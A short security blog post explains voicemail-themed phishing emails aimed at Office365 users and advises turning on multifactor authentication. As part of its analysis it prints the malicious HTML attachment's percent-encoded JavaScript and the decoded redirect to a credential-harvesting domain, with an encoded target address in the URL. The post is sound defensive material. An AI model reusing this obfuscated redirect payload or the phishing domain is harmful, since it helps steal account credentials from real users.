Vishing is a term combining ‘voice’ and ‘phishing’. Those calls you get reporting to be Apple, the IRS, hotel rewards, and auto warranty expirations are all forms of vishing. They are designed to scare, intimidate, or create a sense of urgency to get you to reveal personal, sensitive, or confidential information.

Since Covid-19 and the move to work remotely, we have seen a rise of vishing attempts targeting Office365 tenants in the form of an email alerting the user to a missed audio message.  The email contains an HTML attachment that, when loaded, directs the user to a fake Microsoft login page. The page acts as an intercept between the user and the real page stealing credentials as they are entered.  Incorrect credentials fail, valid credentials are accepted, and the user is presented with a ‘failed to retrieve message’. It also contains malicious code that tries to infect the user’s PC.

Here is how the message looks in standard Outlook preview:

The preview looks legitimate enough but opening the message shows an unfamiliar email address.

The attachment uses Java to decode the obfuscated payload into a URL and present the fake portal:

Original attachment:

“<script language="javascript">document.write(unescape('%3c%73%63%72%69%70%74%20%74%79%70%65%3d%22%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%22%3e%77%69%6e%64%6f%77%2e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%22%68%74%74%70%73%3a%2f%2f%66%72%69%74%6f%77%69%6e%67%2e%69%6e%66%6f%2f%63%65%6f%2f%5a%47%39%31%5a%30%42%30%61%48%4a%6c%59%57%52%75%5a%58%52%33%62%33%4a%72%63%79%35%6a%62%32%30%3d%22%3b%3c%2f%73%63%72%69%70%74%3e'));</script>”

Decoded payload:

“<script type="text/javascript">window.location.href ="https://fritowing.info/ceo/ZG91Z0B0aHJlYWRuZXR3b3Jrcy5jb20=";</script>”

Looking at the URL, it appears this particular campaign is targeting CEOs so we could consider this spear vishing.

Why is this so dangerous? With a hijacked email account, the bad actor can look through past emails, gather intel on other sites that are associated with the email, request password resets, and gain access to more profitable accounts like your bank, credit card provider, or online shopping where you’ve stored a payment method.

The absolute best way to secure your online accounts, including email, is to use multifactor authentication (MFA). MFA uses a rotating code in combination with your password making it much harder to steal credentials. The premise is that it takes “something you know” — your password, and “something you have” — your authentication code, to log in.